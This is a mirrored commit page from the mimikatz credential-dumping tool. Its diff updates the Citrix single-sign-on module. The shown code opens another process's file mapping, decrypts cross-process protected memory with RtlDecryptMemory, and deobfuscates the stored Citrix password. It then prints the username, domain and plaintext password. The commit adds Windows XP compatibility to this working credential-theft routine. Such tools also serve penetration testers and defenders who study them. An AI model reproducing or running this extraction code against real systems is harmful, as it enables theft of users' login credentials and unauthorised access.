RepoMirrors/mimikatz
1
0
Fork 0
mirror of https://github.com/gentilkiwi/mimikatz synced 2025-02-16 09:26:55 +00:00
Code Issues Packages Projects Releases Wiki Activity

[legacy] Some love for Windows XP (RtlDecryptMemory instead of CryptUnprotectMemory - did not exist)

Browse Source
This commit is contained in:
Benjamin DELPY 2022-09-19 22:50:46 +02:00
parent 746e2116d1
commit 82cb7eb237
2 changed files with 6 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
inc/globals.h
View File

@ -131,6 +131,8 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU
#define KULL_M_WIN_MIN_BUILD_11 22000 #define KULL_M_WIN_MIN_BUILD_11 22000
/* mimikatz 3 transition */ /* mimikatz 3 transition */
#define PRINT_ERROR_NUMBER(func, error) PRINT_ERROR(func L": 0x%08x\n", error)
#define GET_CLI_ARG(name, var) (kull_m_string_args_byName(argc, argv, name, var, NULL)) #define GET_CLI_ARG(name, var) (kull_m_string_args_byName(argc, argv, name, var, NULL))
#define GET_CLI_ARG_DEF(name, var, def) (kull_m_string_args_byName(argc, argv, name, var, def)) #define GET_CLI_ARG_DEF(name, var, def) (kull_m_string_args_byName(argc, argv, name, var, def))
#define GET_CLI_ARG_PRESENT(name) (kull_m_string_args_byName(argc, argv, name, NULL, NULL)) #define GET_CLI_ARG_PRESENT(name) (kull_m_string_args_byName(argc, argv, name, NULL, NULL))

9
mimikatz/modules/misc/kuhl_m_misc_citrix.c
View File

@ -21,12 +21,9 @@ BOOL CALLBACK Citrix_Each_SSO_Program(PSYSTEM_PROCESS_INFORMATION pSystemProcess
{ {
DWORD i, ProcessId; DWORD i, ProcessId;
HANDLE hProcess; HANDLE hProcess;
//PKULL_M_MEMORY_HANDLE hMemory;
//KULL_M_MEMORY_ADDRESS aMemory = { NULL, &hMemory };
RTL_USER_PROCESS_PARAMETERS UserProcessParameters; RTL_USER_PROCESS_PARAMETERS UserProcessParameters;
KULL_M_MEMORY_ADDRESS aRemote = {NULL, NULL}, aBuffer = {&UserProcessParameters, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}; KULL_M_MEMORY_ADDRESS aRemote = {NULL, NULL}, aBuffer = {&UserProcessParameters, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
PEB Peb; PEB Peb;
UNREFERENCED_PARAMETER(pvArg); UNREFERENCED_PARAMETER(pvArg);
@ -112,6 +109,7 @@ void Citrix_SSO_Program_FileMapping(HANDLE hRemoteProcess, HANDLE hRemoteFileMap
HANDLE hFileMapping; HANDLE hFileMapping;
PCITRIX_PACKED_CREDENTIALS pCitrixPackedCredentials; PCITRIX_PACKED_CREDENTIALS pCitrixPackedCredentials;
PCITRIX_CREDENTIALS pCitrixCredentials; PCITRIX_CREDENTIALS pCitrixCredentials;
NTSTATUS nStatus;
if (DuplicateHandle(hRemoteProcess, hRemoteFileMapping, GetCurrentProcess(), &hFileMapping, FILE_MAP_READ, FALSE, 0)) if (DuplicateHandle(hRemoteProcess, hRemoteFileMapping, GetCurrentProcess(), &hFileMapping, FILE_MAP_READ, FALSE, 0))
{ {
@ -123,12 +121,13 @@ void Citrix_SSO_Program_FileMapping(HANDLE hRemoteProcess, HANDLE hRemoteFileMap
if (pCitrixCredentials) if (pCitrixCredentials)
{ {
RtlCopyMemory(pCitrixCredentials, pCitrixPackedCredentials->Data, sizeof(pCitrixPackedCredentials->Data)); RtlCopyMemory(pCitrixCredentials, pCitrixPackedCredentials->Data, sizeof(pCitrixPackedCredentials->Data));
if (CryptUnprotectMemory(pCitrixCredentials, sizeof(pCitrixPackedCredentials->Data), CRYPTPROTECTMEMORY_CROSS_PROCESS)) nStatus = RtlDecryptMemory(pCitrixCredentials, sizeof(pCitrixPackedCredentials->Data), RTL_ENCRYPT_OPTION_CROSS_PROCESS); // CryptUnprotectMemory is not Windows XP friendly
if (nStatus == STATUS_SUCCESS)
{ {
CitrixPasswordDesobfuscate((PBYTE)pCitrixCredentials->password, pCitrixCredentials->cbPassword); CitrixPasswordDesobfuscate((PBYTE)pCitrixCredentials->password, pCitrixCredentials->cbPassword);
kprintf(L"| Username : %s\n| Domain : %s\n| Password : %.*s\n| flags/type: 0x%08x\n", pCitrixCredentials->username, pCitrixCredentials->domain, pCitrixCredentials->cbPassword, pCitrixCredentials->password, pCitrixCredentials->dwFlags); kprintf(L"| Username : %s\n| Domain : %s\n| Password : %.*s\n| flags/type: 0x%08x\n", pCitrixCredentials->username, pCitrixCredentials->domain, pCitrixCredentials->cbPassword, pCitrixCredentials->password, pCitrixCredentials->dwFlags);
} }
else PRINT_ERROR_AUTO(L"CryptUnprotectMemory"); else PRINT_ERROR_NUMBER(L"RtlDecryptMemory", nStatus);
LocalFree(pCitrixCredentials); LocalFree(pCitrixCredentials);
} }